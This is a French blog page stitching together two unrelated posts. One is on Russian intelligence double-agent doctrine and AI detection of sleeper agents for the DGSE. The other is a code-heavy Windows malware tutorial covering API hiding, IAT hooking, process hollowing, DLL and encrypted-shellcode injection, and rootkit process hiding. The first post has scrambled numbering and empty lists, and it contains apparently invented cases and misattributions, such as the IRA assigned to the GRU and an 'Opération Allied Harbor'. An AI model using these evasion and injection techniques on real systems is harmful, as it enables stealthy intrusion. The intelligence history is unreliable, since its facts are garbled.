Agents doubles Russes et jeux opérationnels

par Aics-sr | Fév 10, 2026 | Moments d'histoire

Les services de renseignement du monde entier présentent des similitudes. Tous les services professionnels s’appuient sur des techniques d’espionnage pour recruter et gérer leurs agents. Ils opèrent tous au sein de systèmes bureaucratiques et rendent compte, en fin de compte, aux dirigeants politiques. Fondamentalement, les techniques d’espionnage constituent un langage professionnel commun. Cependant, les services de renseignement russes (RIS) diffèrent sensiblement de leurs homologues occidentaux sur plusieurs points clés. Premièrement, leur mission première n’est ni de servir les intérêts du peuple russe, ni de protéger la Constitution ; leur loyauté va au régime et à la survie politique personnelle de Poutine. Deuxièmement, en matière de techniques d’espionnage, leur approche et leurs tactiques diffèrent de celles de la CIA et des autres services occidentaux. L’un des aspects les plus importants — et souvent mal compris — du renseignement russe est le recours aux agents doubles, connus dans la doctrine du renseignement russe sous le nom de « jeux opérationnels » ( operativnye igry ).

Pour les services de renseignement russes, les jeux opérationnels ne relèvent pas de compétences de niche ni de tactiques de contre-espionnage ponctuelles. Ils sont fondamentaux. Les opérations d’agents doubles sont au cœur de la manière dont les agences russes définissent le succès, justifient leur importance et préservent leur identité institutionnelle. Que les autres méthodes de collecte réussissent ou échouent, le RIS recourt systématiquement et sans relâche aux jeux opérationnels. Par conséquent, comprendre comment et pourquoi le RIS utilise des agents doubles est essentiel pour comprendre le renseignement russe lui-même.

1. Loyauté et mission : le régime avant tout

Différence majeure avec l’Occident

• Occident (CIA, MI6, DGSE, etc.) : Les services de renseignement occidentaux sont théoriquement soumis à un cadre démocratique et constitutionnel. Leur mission officielle inclut la protection des intérêts nationaux, la sécurité des citoyens, et le respect des lois. Leur légitimité dépend de leur capacité à servir l’État de droit, même si des dérives existent (ex. : scandales de la NSA ou de la CIA).
  • Exemple : La CIA rend des comptes au Congrès américain et est encadrée par des lois comme le Foreign Intelligence Surveillance Act (FISA).
• Russie (FSB, SVR, GRU) : Les RIS sont des instruments de pouvoir personnel avant tout. Leur mission principale est de protéger le régime et, par extension, la survie politique de Vladimir Poutine. La Constitution russe ou l’intérêt du peuple sont secondaires.
  • Preuve historique : Le FSB a été utilisé pour réprimer l’opposition (ex. : empoisonnement d’Alexeï Navalny), et le SVR/GRU mènent des opérations hybrides (cyberattaques, désinformation) pour affaiblir les adversaires géopolitiques de la Russie, indépendamment des conséquences pour la population russe.
  • Conséquence : Cette loyauté inconditionnelle au régime explique leur résilience malgré les sanctions ou les échecs (ex. : guerre en Ukraine).

2. Les « jeux opérationnels » (operativnye igry) : une doctrine unique

Définition et principes

Les operativnye igry (Оперативные игры) désignent des opérations de manipulation systématique où les agents russes jouent un rôle actif dans la désinformation, la provocation, et la manipulation des perceptions. Contrairement à l’Occident, où les agents doubles sont souvent utilisés de manière ponctuelle (ex. : contre-espionnage), les RIS en font une stratégie centrale.

Caractéristiques clés :

• Approche proactive : Les RIS ne se contentent pas de recruter des agents ou de collecter des informations. Ils créent des réalités alternatives en infiltrant, corrompant ou retournant des acteurs clés (politiques, militaires, médias).
  • Exemple : L’affaire des Illegals (2010), où des agents russes vivaient sous couverture aux États-Unis pendant des années, ou l’influence sur les élections étrangères (ex. : ingérence dans l’élection américaine de 2016).
• Double jeu institutionnalisé : Les agents doubles ne sont pas une exception, mais une norme. Le SVR et le GRU forment leurs officiers à jouer sur plusieurs tableaux, même au sein de leurs propres rangs, pour tester la loyauté et déjouer les trahisons.
  • Cas emblématique : Oleg Gordievsky (agent double du MI6 au KGB) a révélé que le KGB utilisait des « faux transfuges » pour intoxiquer les services occidentaux.
• Objectif ultime : Déstabiliser l’adversaire en semant la méfiance, en exploitant les divisions internes, et en créant des boucles de désinformation (ex. : théories du complot sur l’Ukraine ou l’OTAN).

3. Techniques et tactiques distinctes
4. Recrutement et gestion des agents

• Chantage et compromission (kompromat) : Les RIS privilégient la collecte de preuves compromettantes (sexuelles, financières, idéologiques) pour contrôler leurs cibles, plutôt que de miser sur l’idéalisme ou l’argent (comme le fait souvent la CIA).
  • Exemple : L’affaire Trump-Russie, où des dossiers compromettants (Steele Dossier) ont été utilisés comme levier.
• Agents « dormants » : Des agents sont placés dans des positions clés (diplomatie, économie, médias) et activés des années plus tard.
  • Exemple : Les réseaux d’influence russes en Europe, comme ceux révélés par le rapport Mitrokhin (archives du KGB).

1. Désinformation et guerre cognitive

• Fabrication de narratifs : Les RIS excellent dans la création de fausses flag operations (opérations sous faux drapeau) pour discréditer leurs ennemis.
  • Exemple : L’empoisonnement des Skripal en 2018, attribué à la Russie mais nié par Moscou, qui a proposé des contre-narratifs absurdes (ex. : théorie du « parfum empoisonné »).
• Exploitation des médias sociaux : Le GRU utilise des fermes à trolls (ex. : Internet Research Agency) pour amplifier les divisions politiques en Occident (ex. : mouvement Black Lives Matter ou QAnon).

1. Résilience et adaptabilité

• Apprentissage des échecs : Contrairement aux services occidentaux, qui peuvent être paralysés par un scandale (ex. : affaire Snowden pour la NSA), les RIS intègrent leurs échecs dans leur doctrine. Un agent démasqué devient une opportunité pour lancer une nouvelle opération de désinformation.
  • Exemple : Après l’expulsion de diplomates russes en 2018, le SVR a redoublé d’efforts pour recruter via des plateformes cryptées (Telegram, Signal).

4. Pourquoi cette approche fonctionne-t-elle ?
5. Culture du secret et de la paranoïa

• En Russie, la méfiance généralisée (héritée du KGB) rend les jeux opérationnels efficaces. Les agents sont formés pour anticiper la trahison et utiliser la psychologie humaine (peur, cupidité, idéologie) comme levier.
• Citation de Poutine : « Il n’y a pas d’anciens officiers du KGB. » → La loyauté est permanente, même après la retraite.

1. Asymétrie avec l’Occident

• Les démocraties ont des freins éthiques et juridiques (ex. : interdiction de la torture, transparence relative). Les RIS n’ont pas ces contraintes et exploitent ces faiblesses.
• Exemple : La Russie utilise des mercenaires (groupe Wagner) pour des opérations plausiblement niables, tandis que l’Occident hésite à externaliser ses sales besognes.

1. Patiente stratégique

• Les RIS jouent sur le long terme. Une opération peut prendre 10 ans avant de porter ses fruits (ex. : infiltration des partis d’extrême droite européens).

5. Implications pour les services occidentaux
6. Nécessité d’une nouvelle doctrine

• Comprendre la mentalité russe : Les analystes occidentaux doivent cesser de projeter leurs valeurs (transparence, règles) sur les RIS. La logique russe est celle de la survie du régime, pas de la « victoire » au sens classique.
• Former des contre-experts : Créer des unités spécialisées dans la détection des jeux opérationnels (ex. : cellule StratCom de l’OTAN).

1. Renforcer la résilience

• Protéger les institutions : Limiter l’accès des agents russes aux postes sensibles (ex. : lois contre l’ingérence étrangère, comme le Foreign Agents Registration Act aux États-Unis).
• Lutter contre la désinformation : Investir dans l’éducation aux médias et la cybersécurité pour contrer les campagnes hybrides.

1. Éviter les pièges

• Ne pas sous-estimer la capacité d’adaptation des RIS. Chaque expulsion de diplomates ou sanction est une opportunité pour eux de changer de tactique.

6. Étude de cas : l’Ukraine (2014–2026)

• Jeux opérationnels en action :
  • 2014 : Utilisation de « petits hommes verts » (soldats sans insigne) en Crimée pour créer un flou juridique.
  • 2022–2026 : Campagnes de désinformation sur les « laboratoires biologiques américains » en Ukraine, ou l’accusation de « nazisme » pour justifier l’invasion.
• Agent double emblématique : Oleg Smolenkov (ex-SVR), qui aurait aidé la CIA à comprendre les operativnye igry avant de disparaître en 2017.

Conclusion : un langage, deux grammaires

Les services de renseignement partagent un langage commun (techniques d’espionnage), mais les RIS en ont développé une grammaire propre, où la fin (la survie du régime) justifie tous les moyens. Pour les contrer, l’Occident doit :

1. Adopter une pensée asymétrique : Ne pas jouer selon leurs règles, mais anticiper leurs coups.
2. Renforcer la coopération interservices : Partager les renseignements sur les tactiques russes (ex. : base de données commune sur les agents dormants).
3. Investir dans la guerre cognitive : Former des experts capables de déconstruire les narratifs russes.

4. Comprendre les vulnérabilités françaises ciblées par les RIS
5. Les RIS exploitent systématiquement les faiblesses structurelles de la France, qu’elles soient politiques, économiques, ou sociétales.
6. Cibles prioritaires des RIS en France

Exemple concret : En 2022, la DGSE a déjoué une tentative d’infiltration d’un réseau d’influence russe au sein du Rassemblement National, via des financements opaques et des promesses de soutien médiatique (source : rapport Sénat 2023).

2. Leçons pour la DGSE : adapter la doctrine
3. Renforcer le contre-espionnage « à la russe »

• Créer une unité dédiée aux operativnye igry :
  • Former des analystes spécialisés dans la détection des agents dormants et des opérations de double jeu.
  • Exemple : Le Royaume-Uni a créé le National Protective Security Authority (NPSA) pour contrer les ingérences hybrides. La France pourrait s’en inspirer.
• Développer des « leurres contrôlés » :
  • La DGSE pourrait simuler des fuites d’informations pour identifier les agents russes en France (technique utilisée par le Mossad).
  • Cas d’école : L’opération Hamilcar (années 1980), où la DGSE a retourné un agent du KGB en lui faisant croire à une taupe française au Kremlin.

1. Moderniser la lutte contre la désinformation

• Collaboration avec l’ANSSI et les plateformes numériques :
  • Obliger les réseaux sociaux à signalement proactif des comptes liés à l’Internet Research Agency (ferme à trolls russe).
  • Outils : Utiliser l’IA pour détecter les schémas de désinformation (ex. : répétition de narratifs pro-russes sur l’Ukraine).
• Cellule de contre-désinformation interministérielle :
  • Associer DGSE, DGSI, et Viginum (service anti-fake news) pour une réponse coordonnée.
  • Exemple : La Lituanie a créé un Centre d’excellence pour la communication stratégique (StratCom) de l’OTAN.

1. Protéger les secteurs stratégiques

• Contrôle renforcé des investissements étrangers :
  • Élargir le périmètre de soumission à autorisation pour les secteurs sensibles (énergie, télécoms, défense), comme le fait le CFIUS aux États-Unis.
  • Exemple : En 2021, la France a bloqué l’acquisition d’une entreprise de cybersécurité par un fonds russe.
• Audit des infrastructures critiques :
  • Vérifier les sous-traitants des centrales nucléaires, ports, et réseaux 5G (risque d’infiltration via des sociétés écrans).

3. Renforcer la résilience sociétale
4. Sensibilisation des élites et des médias

• Formations obligatoires pour les hauts fonctionnaires, militaires, et journalistes sur :
  • Les techniques de recrutement par kompromat.
  • La détection des fausses identités (ex. : diplomates russes sous couverture).
• Campagnes grand public :
  • Expliquer les méthodes russes (ex. : documentaires, modules scolaires), comme le fait la Suède avec son programme Totalförsvar (défense totale).

1. Lutte contre l’ingérence via les diasporas

• Surveillance discrète des réseaux pro-russes :
  • Cibler les associations culturelles, églises orthodoxes, et oligarques installés en France (ex. : Viktor Vekselberg, proche de Poutine, possèdait des actifs en France).
  • Outils juridiques : Utiliser la loi Sapin 2 contre la corruption et le blanchiment.

4. Coopération européenne et atlantique
5. Partager le renseignement en temps réel

• Intégrer pleinement le European Intelligence Analysis Centre (INTCEN) :
  • Échanger des indicateurs de compromise (IOC) avec l’Allemagne, les Pays-Bas, et les pays baltes (cibles majeures des RIS).
• Renforcer le lien avec la CIA et le MI6 :
  • Exemple : L’opération Allied Harbor (2018), où la DGSE a collaboré avec la CIA pour expulser des espions russes en Europe.

1. Sanctions ciblées et diplomatie offensive

• Liste noire européenne des agents russes :
  • Étendre les sanctions à leurs famille et réseaux financiers (comme le fait l’UE depuis 2022).
• Expulsions coordonnées :
  • Répliquer aux expulsions massives de diplomates russes (ex. : 40 expulsions en 2018 après l’affaire Skripal).

5. Innovations technologiques et juridiques
6. Cybersécurité : anticiper les attaques hybrides

• DGSE + ANSSI :
  • Développer des cyber-pièges (honeypots) pour attirer et identifier les hackers du GRU (ex. : unité Bureau 12 de la DGSE).
  • Exemple : En 2020, la France a attribué la cyberattaque contre l’hôpital de Villefranche au groupe APT29 (lié au SVR).

1. Cadre juridique adapté

• Loi sur l’ingérence étrangère :
  • Inspiré du Foreign Agents Registration Act (FARA) américain, obligera les lobbyistes pro-russes à se déclarer.
  • Projet en cours : La proposition de loi LOPMI (2024) va dans ce sens.
• Protection des lanceurs d’alerte :
  • Créer un statut européen pour les transfuges russes (ex. : Maksim Shugaley, agent du GRU arrêté en Libye en 2019).

6. Étude de cas : l’affaire Benalla et les leçons non tirées

• Contexte : En 2018, Alexandre Benalla, collaborateur d’Emmanuel Macron, a été lié à des négociations avec des oligarques russes (via des intermédiaires).
• Erreurs françaises :
  • Manque de vigilance sur les conflits d’intérêts.
  • Absence de vérification approfondie des contacts étrangers de l’Élysée.
• Leçon :
  • Audit systématique des entourages présidentiels et ministériels par la DGSI.

7. Recommandations concrètes pour la France

8. Pièges à éviter

• Sous-estimer la patience russe : Les RIS préparent leurs opérations sur 10–15 ans (ex. : infiltration de l’extrême droite française depuis les années 2000).
• Négliger les alliances improbables : La Russie collabore avec la Chine et l’Iran pour des opérations conjointes (ex. : cyberattaques, désinformation).
• Réagir de manière prévisible : Les expulsions de diplomates doivent être coordonnées avec l’UE pour éviter les représailles ciblées.

Conclusion : une approche globale et proactive

La France doit combiner :

1. Renseignement offensif (infiltration des réseaux russes).
2. Protection des infrastructures (énergie, défense, numérique).
3. Résilience sociétale (éducation, transparence).
4. Coopération internationale (UE, OTAN).

L’utilisation de l’intelligence artificielle (IA) par la DGSE pour détecter les agents dormants russes (ou d’autres services étrangers) représente une opportunité majeure, mais aussi un défi technique et éthique. Voici une analyse structurée des méthodes, outils et limites d’une telle approche, adaptée au contexte français et aux spécificités des operativnye igry russes.

1. Définition : Qu’est-ce qu’un agent dormant ?

Un agent dormant est un individu recruté et formé par un service de renseignement étranger, mais inactif pendant des années, voire des décennies, jusqu’à son activation. Il peut être :

• Un citoyen français (recruté via chantage, idéologie ou argent).
• Un diplomate, homme d’affaires ou étudiant sous couverture.
• Un membre d’une diaspora ou d’un réseau d’influence.

Exemple russe : Les Illegals du SVR (comme Anna Chapman, démasquée en 2010) vivaient aux États-Unis sous de fausses identités pendant des années.

2. Comment l’IA peut aider la DGSE ?
3. Analyse des données massives (Big Data)

L’IA excelle dans le traitement de volumes colossaux de données pour identifier des anomalies ou des schémas suspects.

Sources de données exploitables :

Cas pratique : En 2020, le MI5 britannique a utilisé l’IA pour croiser des données de téléphonie et de voyages, ce qui a permis de démasquer un réseau d’agents dormants du GRU.

1. Techniques d’IA applicables
2. Apprentissage supervisé (Supervised Learning)

• Principe : L’IA est entraînée sur des jeux de données labellisés (ex. : profils connus d’agents russes vs. citoyens ordinaires).
• Applications :
  • Classification des comportements : L’IA identifie des signaux faibles (ex. : un cadre français qui communique régulièrement avec une ambassade russe, sans raison professionnelle).
  • Détection de langages codés : Analyse sémantique des échanges pour repérer des mots-clés ou des phrases types utilisés par les services russes.

2. Apprentissage non supervisé (Unsupervised Learning)

• Principe : L’IA recherche des anomalies dans des datasets non étiquetés.
• Applications :
  • Clustering : Regroupement d’individus aux profiles similaires (ex. : plusieurs personnes sans lien apparent, mais qui voyagent aux mêmes dates en Russie).
  • Détection de réseaux cachés : Cartographie des connexions indirectes (ex. : un universitaire français en contact avec un oligarque russe via une ONG).

3. Traitement automatique du langage (NLP)

• Principe : Analyse des textes (e-mails, posts sur les réseaux) pour détecter des incohérences ou des narratifs pro-russes.
• Applications :
  • Détection de propagande ou de désinformation (ex. : reprise systématique de thèmes du Kremlin).
  • Identification de fausses identités (ex. : un profil LinkedIn créé il y a 2 ans, mais avec une histoire professionnelle invérifiable).

4. Analyse des réseaux (Graph Analytics)

• Principe : Modélisation des relations entre individus (réseaux sociaux, transactions).
• Applications :
  • Visualisation des liens faibles (ex. : un fonctionnaire français et un diplomate russe ont le même contact à Moscou).
  • Détection de communautés suspectes (ex. : un groupe de lobbyistes pro-russes en contact avec des militaires).

5. Reconnaissance biométrique

• Principe : Comparaison de visages ou de voix avec des bases de données russes.
• Applications :
  • Vérification si un « étudiant russe » en France correspond à un agent connu du SVR (via des bases comme Frontex ou Interpol).

1. Outils concrets pour la DGSE

Exemple français : La DGSE utilise déjà des outils similaires pour la lutte antiterroriste. Une adaptation pour le contre-espionnage est envisageable, avec des algorithmes spécifiques aux méthodes russes.

3. Étapes pour mettre en place un système IA anti-agents dormants

Étape 1 : Collecte et centralisation des données

• Sources :
  • ANSSI (cyber).
  • Douanes (voyages).
  • Banques (transactions).
  • Réseaux sociaux (via des partenariats légaux).
• Cadre juridique :
  • Utiliser la loi renseignement (2015) et le RGPD (avec dérogations pour la sécurité nationale).

Étape 2 : Entraînement de l’IA

• Jeux de données :
  • Profils d’agents russes déjà démasqués (ex. : affaires passées).
  • Données synthétiques pour simuler des scénarios.
• Collaboration :
  • Partenariat avec le CEA ou Inria pour développer des algorithmes sur mesure.

Étape 3 : Détection et alerte

• Seuils d’alerte :
  • Un individu avec 3 signaux faibles (ex. : voyage en Russie + contact avec un diplomate + intérêt pour la défense) déclenche une enquête humaine.
• Validation par des analystes :
  • L’IA ne remplace pas le jugement humain, mais priorise les cibles.

Étape 4 : Action

• Surveillance discrète (filature, écoutes légales).
• Recrutement en tant qu’agent double (si possible).
• Neutralisation (expulsion, arrestation).

4. Limites et risques
5. Faux positifs et biais

• Risque : L’IA peut stigmatiser des innocents (ex. : un universitaire étudiant la Russie).
• Solution :
  • Audit régulier des algorithmes par des experts indépendants.
  • Transparence partielle (ex. : expliquer à un suspect pourquoi il est surveillé).

1. Contournement par les RIS

• Les agents russes adaptent leurs méthodes :
  • Utilisation de messageries chiffrées (Signal, Telegram).
  • Fausses pistes (ex. : créer des profils « leurres » pour saturer l’IA).
• Solution :
  • Mettre à jour en continu les modèles d’IA avec les dernières tactiques russes.

1. Enjeux éthiques et juridiques

• Vie privée : La surveillance de masse est illégale en France sans motif valable.
• Solution :
  • Cibler uniquement les personnes à risque (ex. : hauts fonctionnaires, militaires).
  • Contrôle parlementaire (via la Délégation parlementaire au renseignement).

5. Exemple concret : un scénario d’utilisation

Cas : Un ingénieur de Naval Group (spécialisé dans les sous-marins) est repéré par l’IA parce que :

1. Il a voyagé 5 fois à Saint-Pétersbourg en 2 ans (sans raison professionnelle).
2. Son compte LinkedIn a été « liké » par un attaché militaire russe.
3. Il a recherché des articles sur les systèmes de propulsion nucléaire.
4. Il a reçu un virement de 5 000 € d’une société offshore.

Processus :

1. L’IA signale le profil à la DGSE.
2. Une équipe vérifie manuellement les données.
3. Si confirmation, surveillance rapprochée ou interpellation.

6. Comparaison internationale

7. Recommandations pour la DGSE

1. Investir dans des partenariats tech :
   • Collaborer avec Thales, Atos, ou des startups françaises (ex. : Dataiku).
2. Former des data scientists :
   • Créer une unité dédiée au sein de la DGSE, mixant experts en IA et anciens agents.
3. Coopérer avec l’UE :
   • Partager des bases de données avec l’Allemagne et les Pays-Bas (cibles majeures des RIS).
4. Anticiper l’évolution des menaces :
   • Intégrer l’analyse des deepfakes et des bots sur les réseaux sociaux.

8. Conclusion : l’IA comme multiplicateur de force

L’IA ne remplacera pas le travail humain de la DGSE, mais elle peut : ✅ Automatiser la détection des signaux faibles. ✅ Réduire le temps d’enquête de plusieurs mois à quelques jours. ✅ Identifier des réseaux invisibles aux méthodes traditionnelles.

Prochaine étape : La France pourrait lancer un projet pilote sur un secteur critique (ex. : énergie ou défense), en s’inspirant du modèle israélien (Unit 8200).

L’Art de la Création de Malware ( fourni à des fins éducatives et de recherche en sécurité offensive)

par Aics-sr | Fév 10, 2026 | Moments d'histoire

L’Art de la Création de Malware ( fourni à des fins éducatives et de recherche en sécurité offensive)

Techniques Avancées d’Évasion et d’Injection

Décortiquer les mécanismes utilisés par les acteurs malveillants pour détourner l’exécution du code, échapper aux détections et s’implanter profondément dans les systèmes Windows.

Nous aborderons des concepts allant de la manipulation bas-niveau des structures système (comme le PEB) aux techniques d’injection de shellcode chiffré, en passant par l’émulation de tactiques attribuées à des groupes APT (Advanced Persistent Threat) tels qu’APT28, APT29 et APT33.

 Note importante : Ce contenu est fourni à des fins éducatives et de recherche en sécurité offensive. La compréhension de ces techniques est essentielle pour développer des défenses robustes.

1. Les Fondamentaux : Windows API et Liaison Dynamique

L’API Windows (WinAPI) est l’interface fondamentale permettant aux programmes d’interagir avec le système d’exploitation. Pour un développeur de malware, la manière dont les fonctions sont chargées peut faire la différence entre la détection et la furtivité.

Liaison Statique vs Dynamique

• Liaison statique : Le code de la fonction est intégré directement dans l’exécutable.

int main(void) {

    MessageBoxA(0, “Foo Here.”, “Info”, 0);

    return 0;

}

• Problème : Facilement détectable par les outils de sécurité.
• Liaison dynamique : La fonction est chargée à l’exécution depuis une DLL.

int main(void) {

    size_t get_MessageBoxA = (size_t)GetProcAddress(LoadLibraryA(”USER32.dll”), “MessageBoxA”);

    def_MessageBoxA msgbox_a = (def_MessageBoxA)get_MessageBoxA;

    msgbox_a(0, “Foo Here.”, “Info”, 0);

    return 0;

}

Avantage : Réduit la signature statique et permet une résolution d’API à la volée.

2. Accès au PEB (Process Environment Block)

Le PEB est une structure de données critique contenant des informations sur le processus en cours d’exécution. Il est accessible en mode utilisateur et permet de récupérer les adresses de base des modules chargés (DLL).

Localisation du PEB

• x86 : fs:[0x30]
• x64 : gs:[0x60]

Exemple : Récupération de l’adresse de base d’une DLL

size_t GetModHandle(wchar_t *libName) {

    PEB32 *pPEB = (PEB32 *)__readfsdword(0x30);

    PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);

    for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {

        LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks);

        if (StrStrIW(libName, data->BaseDllName.Buffer))

            return data->DllBase;

    }

    return 0;

}

Cette fonction parcourt la liste des modules chargés pour trouver kernel32.dll et récupérer son adresse de base.

3. Résolution Dynamique d’API via les Tables d’Export

Une fois le module de base obtenu, on peut parser sa table d’export pour localiser l’adresse d’une fonction spécifique.

size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {

    // Parsing des en-têtes PE

    PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);

    PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);

    IMAGE_DATA_DIRECTORY dataDir_exportDir = ntHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

    // Accès à la table d’export

    PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);

    DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);

    DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);

    WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);

    // Recherche de la fonction par nom

    for (size_t i = 0; i < exportTable->NumberOfNames; i++) {

        char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);

        if (!stricmp(sz_CurrApiName, szFuncName)) {

            WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;

            return moduleBase + arrFuncs[num_CurrApiOrdinal – 1];

        }

    }

    return 0;

}

Cette technique permet d’appeler des API comme WinExec de manière totalement dynamique, sans import statique.

int main() {

    size_t kernelBase = GetModHandle(L”kernel32.dll”);

    size_t ptr_WinExec = GetFuncAddr(kernelBase, “WinExec”);

    ((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)(”calc”, SW_SHOW);

    return 0;

}

4. IAT Hooking – Détournement de la Table d’Import

L’IAT (Import Address Table) contient les adresses des fonctions importées par un module. En hookant l’IAT, on peut intercepter et modifier les appels d’API.

void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr) {

    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];

    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];

    for (; impModuleList->Name; impModuleList++) {

        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];

        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];

        for (int i = 0; arr_apiNames[i].u1.Function; i++) {

            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];

            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name)) {

                apiAddr = arr_callVia[i].u1.Function;

                arr_callVia[i].u1.Function = callback; // Remplacement de l’adresse

                break;

            }

        }

    }

}

Utilisation : Hook de MessageBoxA pour modifier son comportement.

5. Process Hollowing – Remplacement de Processus Légitimes

Cette technique consiste à créer un processus légitime en état suspendu, puis à remplacer son code et ses données par une charge malveillante.

Étapes clés :

1. Création du processus suspendu avec CreateProcessA et le flag CREATE_SUSPENDED.
2. Allocation de mémoire dans le processus cible via VirtualAllocEx.
3. Écriture des en-têtes PE et des sections dans la mémoire allouée avec WriteProcessMemory.
4. Mise à jour du contexte du thread (registre EAX) pour pointer vers le point d’entrée du nouveau code.
5. Reprise de l’exécution avec ResumeThread.

// Création du processus suspendu

CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI);

// Injection du code malveillant

WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)

    WriteProcessMemory(PI.hProcess, LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),

                       LPVOID((size_t)Image + SectionHeader[i].PointerToRawData),

                       SectionHeader[i].SizeOfRawData, 0);

// Modification du contexte et reprise

CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;

SetThreadContext(PI.hThread, LPCONTEXT(CTX));

ResumeThread(PI.hThread);

Cas réel : Cette méthode est similaire à celle utilisée par X-Agent (APT28/Fancy Bear).

6. Techniques d’Injection de DLL

L’injection de DLL permet d’introduire du code dans un processus cible. Plusieurs méthodes existent :

1. Via LoadLibraryA

• Alloue de la mémoire pour le chemin de la DLL.
• Utilise CreateRemoteThread pour appeler LoadLibraryA avec ce chemin.

WriteProcessMemory(hHandle, dllPathAddr, dllPath, strlen(dllPath), NULL);

CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibAddr, dllPathAddr, 0, NULL);

1. Via NtCreateThreadEx (API non documentée)

• Plus furtif, évite les détections basées sur CreateRemoteThread.
• Nécessite la résolution dynamique de NtCreateThreadEx depuis ntdll.dll.

7. Injection de Shellcode et Évasion

Le shellcode est du code machine autonome, souvent utilisé pour des exécutions directes en mémoire.

Exemple : Injection de shellcode chiffré AES (Technique Early Bird – APT33)

int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {

    HCRYPTPROV hProv; HCRYPTHASH hHash; HCRYPTKEY hKey;

    CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);

    CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);

    CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);

    CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);

    CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);

    // Nettoyage

    CryptDestroyKey(hKey); CryptDestroyHash(hHash); CryptReleaseContext(hProv, 0);

    return 0;

}

Processus :

1. Création d’un processus suspendu (svchost.exe).
2. Déchiffrement du shellcode en mémoire.
3. Allocation et écriture du shellcode dans le processus cible.
4. Exécution via QueueUserAPC pour une injection furtive.

8. Développement d’un Rootkit en Mode Kernel

Un rootkit opère au niveau le plus bas du système pour masquer sa présence.

1. Driver Entry Point

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) {

    DbgPrint(”Hello World!”);

    return STATUS_SUCCESS;

}

1. Dissimulation de Processus via DKOM (Direct Kernel Object Manipulation)

NTSTATUS HideProcess(ULONG pid) {

    PEPROCESS currentEProcess = PsGetCurrentProcess();

    LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;

    // Parcours de la liste des processus

    // Suppression du processus cible de la liste chaînée

    blink->Flink = flink;

    flink->Blink = blink;

    return STATUS_SUCCESS;

}

Cette technique manipule la structure EPROCESS pour rendre un processus invisible aux outils système.

1. Injection de DLL en Mode Kernel

• Utilisation de PsSetLoadImageNotifyRoutine pour surveiller le chargement de kernel32.dll.
• Injection via APC (Asynchronous Procedure Call) pour exécuter du code dans un thread cible.

Conclusion : L’Évolution Continue des Techniques Malveillantes

Nous avons parcouru un large éventail de techniques, de la manipulation basique d’API à la création de rootkits kernel. Chaque méthode présente des avantages et des limitations, et leur efficacité dépend du contexte d’utilisation et des mesures de défense en place.

Rappel : Ces connaissances doivent servir à renforcer la cybersécurité, non à nuire. La compréhension offensive est un pilier essentiel de la défense proactive.